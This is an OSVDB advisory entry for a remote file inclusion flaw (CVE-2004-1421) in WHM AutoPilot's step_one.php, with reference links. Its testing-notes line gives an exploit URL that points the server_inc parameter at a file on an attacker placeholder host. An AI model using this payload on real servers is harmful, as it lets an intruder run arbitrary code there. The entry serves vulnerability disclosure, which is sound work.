WHM AutoPilot step_one.php Arbitrary Command Execution

2004-12-28T16:56:24
ID OSVDB:12694
Type osvdb
Reporter OSVDB
Modified 2004-12-28T16:56:24

Description

Manual Testing Notes

http://[victim]/inc/header.php/step_one.php?server_inc=http://[attacker]/step_one_tables.php

References:

Vendor URL: http://www.whmautopilot.com/
Security Tracker: 1012707
Secunia Advisory ID: 13673
Related OSVDB ID: 12693
Related OSVDB ID: 12696
Related OSVDB ID: 12695
Related OSVDB ID: 12697
Other Advisory URL: http://www.gulftech.org/?node=research&article_id=00059-12272004
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-12/0431.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-12/0474.html
Keyword: Remote File Inclusion
CVE-2004-1421